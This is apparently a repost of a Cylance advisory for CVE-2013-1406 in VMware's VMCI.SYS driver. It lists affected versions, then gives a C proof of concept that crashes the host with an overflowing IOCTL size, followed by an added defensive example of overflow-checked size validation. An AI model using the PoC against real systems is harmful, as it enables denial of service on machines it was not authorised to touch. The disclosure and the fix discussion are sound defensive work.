Nytro

VMCI.SYS IOCTL Host and Guest Privilege Elevation (CVE-2013-1406)



Cylance, Inc.

Derek Soeder

Reported: July 12, 2012

Published: February 8, 2013

Affected Vendor: VMware, Inc.

Affected Environments

The following VMware host product versions are known to be affected:

  • VMware Server 2.0.2 and earlier
  • VMware Workstation 7.0.0
  • VMware Workstation 7.1.6 and earlier
  • Other versions that support virtual hardware version 7 were not tested due to unavailability, but are assumed to be affected

The following VMware Tools versions are known to be affected:

  • VMware Tools 7.7.6 and earlier (VMware Server 2.0.2 and earlier)
  • VMware Tools 8.0.4 and earlier (VMware ESXi 4.0.0 Update 4 and earlier)
  • VMware Tools 8.1.3 (VMware Workstation 7.0.0)
  • VMware Tools 8.3.7 and earlier (VMware ESXi 4.1.0 Update 1 and earlier)
  • VMware Tools 8.3.12 prior to build-653202 (VMware ESXi 4.1.0 Update 2 prior to Build 659051 (without ESXi410-201204402-BG))
  • VMware Tools 8.4.9 and earlier (VMware Workstation 7.1.6 and earlier)
  • VMware Tools 8.6.0 (VMware ESXi 5.0.0)

Analysis:

http://www.cylance.com/labs/advisories/02-08-2013-Advisory.shtml

PoC:

    /*
     * This PoC is only for VMCI.SYS version 9.0.13.0
     */

    #include <stdio.h>
    #include <tchar.h>
    #include <windows.h>

    #define count_massive 0x189                 /* number of ints in each buffer */
    #define ioctl_vmsock 0x8103208C             /* affected VMCI IOCTL code */
    #define integer_overflow_size 0x12492492    /* value placed in the unchecked size parameter */

    int _tmain(int argc, _TCHAR* argv[])
    {
        HANDLE vmci_device;
        DWORD bytesRet;
        int inbuf[count_massive];
        int outbuf[count_massive];
        int size_ = count_massive * sizeof(int);

        printf("**************************************************\r\n");
        printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
        printf("**************************************************\r\n");

        // opening the vmci interface device
        vmci_device = CreateFileW(L"\\\\.\\vmci", GENERIC_READ, FILE_SHARE_WRITE | FILE_SHARE_READ,
                                  NULL, OPEN_EXISTING, 0, NULL);
        if (vmci_device != INVALID_HANDLE_VALUE)
        {
            printf("[+]vmci device opened \r\n");
            // prepare input buffer
            memset(inbuf, 0, size_);
            // vulnerable to integer overflowing parameter
            inbuf[4] = integer_overflow_size;
            printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");
            // Delaying signed with Diablo stamp
            Sleep(0x29a);
            Sleep(0x1000);
            DeviceIoControl(vmci_device, ioctl_vmsock, inbuf, size_, outbuf, size_, &bytesRet, NULL);
            CloseHandle(vmci_device);
        }
        else
        {
            printf("[-]Error: Can't open vmci device!\r\n");
        }
        return 0;
    }

Source: [C] CVE-2013-1406 PoC DOS exploit - Pastebin.com
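The PoC above only says that the dword at inbuf[4] is an "integer overflowing parameter" and that the driver crashes once it is large enough. The bug class is a size computation that wraps in 32-bit arithmetic before being used, so the defensive fix an IOCTL handler needs is to check the computation before trusting it. The following is an added example, not code from the advisory, the PoC or VMware: the buffer layout (count read from dword slot 4, as in the PoC), the fixed header size HDR_BYTES and the per-element size ELEM_BYTES are constructed for illustration, because the real VMCI.SYS arithmetic is not described on this page. It shows the unchecked form wrapping to a tiny byte count beside the checked form that rejects the same input.

```c
/* Added example (not from the advisory or the PoC): overflow-checked size
 * computation of the kind an IOCTL handler needs before trusting a
 * user-supplied count. Layout and sizes below are constructed. */
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define COUNT_INDEX  4u    /* dword slot the PoC fills (inbuf[4]) */
#define HDR_BYTES    20u   /* constructed: fixed bytes before the elements */
#define ELEM_BYTES   8u    /* constructed: bytes per element */
#define BUF_DWORDS   0x189 /* same input buffer size as the PoC */

/* Unchecked 32-bit computation, as a careless handler might write it:
 * count * ELEM_BYTES + HDR_BYTES wraps silently once count is large. */
uint32_t required_bytes_unchecked(uint32_t count)
{
    return count * ELEM_BYTES + HDR_BYTES;
}

/* Checked version: true only when the product cannot wrap and the result
 * fits inside the input buffer the caller actually supplied. */
bool required_bytes_checked(uint32_t count, uint32_t in_len, uint32_t *out)
{
    uint32_t bytes;
    /* largest count whose product still leaves room for the header */
    if (count > (UINT32_MAX - HDR_BYTES) / ELEM_BYTES)
        return false;
    bytes = count * ELEM_BYTES + HDR_BYTES;
    if (bytes > in_len)
        return false;
    *out = bytes;
    return true;
}

/* Validate a raw input buffer: read the count from dword COUNT_INDEX and
 * accept (1) or reject (0) the request, writing the accepted size. */
int validate_ioctl_input(const uint8_t *in, uint32_t in_len, uint32_t *bytes_out)
{
    uint32_t count;
    if (in_len < (COUNT_INDEX + 1) * sizeof(uint32_t))
        return 0;                         /* header itself is truncated */
    memcpy(&count, in + COUNT_INDEX * sizeof(uint32_t), sizeof count);
    return required_bytes_checked(count, in_len, bytes_out) ? 1 : 0;
}

/* Build a constructed PoC-shaped buffer holding `count` in slot 4 and run
 * the validator; returns the accepted byte count, or 0 when rejected. */
uint32_t demo_bytes(uint32_t count)
{
    uint32_t buf[BUF_DWORDS];
    uint32_t bytes = 0;
    memset(buf, 0, sizeof buf);
    buf[COUNT_INDEX] = count;
    if (!validate_ioctl_input((const uint8_t *)buf, (uint32_t)sizeof buf, &bytes))
        return 0;
    return bytes;
}

int main(void)
{
    /* 0x20000001 * 8 wraps to 8, so the unchecked form reports only 28 bytes */
    printf("unchecked(0x20000001) = %u bytes\n", required_bytes_unchecked(0x20000001u));
    printf("checked(0x20000001)   = %u (0 = rejected)\n", demo_bytes(0x20000001u));
    /* 100 * 8 + 20 = 820 bytes fits in the 0x624-byte buffer */
    printf("checked(100)          = %u bytes\n", demo_bytes(100u));
    /* 200 * 8 + 20 = 1620 bytes does not wrap but exceeds the buffer */
    printf("checked(200)          = %u (0 = rejected)\n", demo_bytes(200u));
    return 0;
}
```

The division-based bound is the portable form of the check; in a real Windows driver the same guard is spelled with the intsafe.h helpers (RtlULongMult / RtlULongAdd), which return an error status instead of a wrapped value. The second test, a count that does not wrap but still exceeds the supplied buffer, is the one that the overflow check alone does not cover, which is why the length comparison is kept as a separate step.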
